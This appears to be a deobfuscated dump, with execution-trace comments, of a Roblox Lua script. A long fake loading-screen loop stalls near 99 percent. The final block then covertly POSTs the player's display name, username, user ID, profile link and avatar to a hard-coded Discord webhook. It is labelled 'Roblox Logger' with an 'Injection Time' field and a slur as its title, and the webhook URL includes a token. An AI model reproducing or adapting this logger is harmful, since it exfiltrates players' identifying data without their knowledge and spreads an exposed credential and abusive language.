    local Math_Min_Result_35 = math.min(
        v1026 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_35, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_35 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1026 * 2
        ) % 4
    );
    LoadingText.Text = "loading...";
    task.wait(0.05);
    if Math_Min_Result_35 < 0.99 then -- ran, if id: 109

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 110

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 111
        v1049 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_36 = math.min(
        v1049 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_36, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_36 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1049 * 2
        ) % 4
    );
    LoadingText.Text = "loading...";
    task.wait(0.05);
    if Math_Min_Result_36 < 0.99 then -- ran, if id: 112

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 113

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 114
        v1072 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_37 = math.min(
        v1072 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_37, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_37 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1072 * 2
        ) % 4
    );
    LoadingText.Text = "loading...";
    task.wait(0.05);
    if Math_Min_Result_37 < 0.99 then -- ran, if id: 115

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 116

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 117
        v1095 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_38 = math.min(
        v1095 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_38, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_38 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1095 * 2
        ) % 4
    );
    LoadingText.Text = "loading...";
    task.wait(0.05);
    if Math_Min_Result_38 < 0.99 then -- ran, if id: 118

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 119

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 120
        v1118 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_39 = math.min(
        v1118 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_39, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_39 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1118 * 2
        ) % 4
    );
    LoadingText.Text = "loading...";
    task.wait(0.05);
    if Math_Min_Result_39 < 0.99 then -- ran, if id: 121

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 122

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 123
        v1141 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_40 = math.min(
        v1141 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_40, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_40 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1141 * 2
        ) % 4
    );
    LoadingText.Text = "loading...";
    task.wait(0.05);
    if Math_Min_Result_40 < 0.99 then -- ran, if id: 124

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 125

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 126
        v1164 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_41 = math.min(
        v1164 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_41, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_41 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1164 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_41 < 0.99 then -- ran, if id: 127

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 128

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 129
        v1187 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_42 = math.min(
        v1187 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_42, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_42 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1187 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_42 < 0.99 then -- ran, if id: 130

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 131

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 132
        v1210 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_43 = math.min(
        v1210 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_43, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_43 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1210 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_43 < 0.99 then -- ran, if id: 133

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 134

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 135
        v1233 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_44 = math.min(
        v1233 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_44, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_44 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1233 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_44 < 0.99 then -- ran, if id: 136

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 137

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 138
        v1256 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_45 = math.min(
        v1256 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_45, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_45 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1256 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_45 < 0.99 then -- ran, if id: 139

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 140

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 141
        v1279 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_46 = math.min(
        v1279 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_46, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_46 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1279 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_46 < 0.99 then -- ran, if id: 142

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 143

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 144
        v1302 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_47 = math.min(
        v1302 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_47, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_47 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1302 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_47 < 0.99 then -- ran, if id: 145

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 146

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 147
        v1325 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_48 = math.min(
        v1325 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_48, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_48 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1325 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_48 < 0.99 then -- ran, if id: 148

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 149

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 150
        v1348 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_49 = math.min(
        v1348 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_49, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_49 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1348 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_49 < 0.99 then -- ran, if id: 151

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 152

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 153
        v1371 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_50 = math.min(
        v1371 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_50, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_50 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1371 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_50 < 0.99 then -- ran, if id: 154

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 155

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 156
        v1394 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_51 = math.min(
        v1394 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_51, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_51 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1394 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_51 < 0.99 then -- ran, if id: 157

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 158

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 159
        v1417 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_52 = math.min(
        v1417 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_52, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_52 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1417 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_52 < 0.99 then -- ran, if id: 160

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 161

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 162
        v1440 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_53 = math.min(
        v1440 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_53, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_53 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1440 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_53 < 0.99 then -- ran, if id: 163

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 164

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 165
        v1463 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_54 = math.min(
        v1463 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_54, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_54 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1463 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_54 < 0.99 then -- ran, if id: 166

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 167

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 168
        v1486 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_55 = math.min(
        v1486 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_55, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_55 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1486 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_55 < 0.99 then -- ran, if id: 169

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 170

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 171
        v1509 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_56 = math.min(
        v1509 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_56, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_56 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1509 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_56 < 0.99 then -- ran, if id: 172

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 173

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 174
        v1532 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_57 = math.min(
        v1532 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_57, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_57 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1532 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_57 < 0.99 then -- ran, if id: 175

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 176

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 177
        v1555 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_58 = math.min(
        v1555 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_58, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_58 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1555 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_58 < 0.99 then -- ran, if id: 178

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 179

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 180
        v1578 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_59 = math.min(
        v1578 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_59, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_59 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1578 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_59 < 0.99 then -- ran, if id: 181

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 182

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 183
        v1601 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_60 = math.min(
        v1601 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_60, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_60 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1601 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_60 < 0.99 then -- ran, if id: 184

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 185

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 186
        v1624 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_61 = math.min(
        v1624 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_61, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_61 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1624 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_61 < 0.99 then -- ran, if id: 187

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 188

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 189
        v1647 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_62 = math.min(
        v1647 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_62, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_62 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1647 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_62 < 0.99 then -- ran, if id: 190

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 191

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 192
        v1670 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_63 = math.min(
        v1670 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_63, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_63 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1670 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_63 < 0.99 then -- ran, if id: 193

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 194

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 195
        v1693 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_64 = math.min(
        v1693 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_64, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_64 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1693 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_64 < 0.99 then -- ran, if id: 196

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 197

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 198
        v1716 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_65 = math.min(
        v1716 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_65, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_65 * 100
    ) .. "%";
    local _ = math.floor(
        v1716 * 2
    ) % 4;
end);
CharacterAdded:Connect(function(character_1, a_8, b_8, c_8)
    if ImageLabel then
    else -- didnt run (else), if id: 203
        if ImageLabel.Parent then
        else -- didnt run (else), if id: 204
            ImageLabel.Image = "rbxthumb://type=AvatarHeadShot&id=" .. (
                UserId .. "&w=150&h=150"
            );
        end;
    end;
end);
game:GetService("RunService").Heartbeat:Connect(function(deltaTime, p2_9, a_9, b_9, c_9)

end);
local _ = request{
    ["Body"] = game:GetService("HttpService"):JSONEncode({
        ["username"] = "Roblox Logger",
        ["embeds"] = {
            {
                ["fields"] = {
                    {
                        ["value"] = string.format("[%s](%s)", DisplayName, Profile),
                        ["name"] = "\240\159\145\164 User",
                        ["inline"] = true
                    },
                    {
                        ["value"] = string.format("[%d](%s)", UserId, Profile),
                        ["name"] = "\240\159\134\148 User ID",
                        ["inline"] = true
                    },
                    {
                        ["value"] = os.date"%Y-%m-%d %I:%M:%S %p",
                        ["name"] = "\226\143\176 Injection Time",
                        ["inline"] = false
                    }
                },
                ["title"] = "retard detected",
                ["footer"] = {
                    ["icon_url"] = "https://www.roblox.com/favicon.ico",
                    ["text"] = "4jsy"
                },
                ["color"] = 16711680,
                ["author"] = {
                    ["url"] = Profile,
                    ["name"] = string.format("%s (@%s)", DisplayName, Name),
                    ["icon_url"] = Image
                },
                ["thumbnail"] = {
                    ["url"] = Image
                },
                ["timestamp"] = os.date"!%Y-%m-%dT%H:%M:%SZ"
            }
        },
        ["avatar_url"] = "https://www.roblox.com/favicon.ico"
    }),
    ["Url"] = "https://discord.com/api/webhooks/1457393444229218492/H6cUHzqp-KcfnLPPRwfYTXK062hapGKAK5yYuxGIxwyjyV7Qd99w3NQ0J_GVZd5I0eeG",
    ["Method"] = "POST",
    ["Headers"] = {
        ["Content-Type"] = "application/json"
    }
}.Body;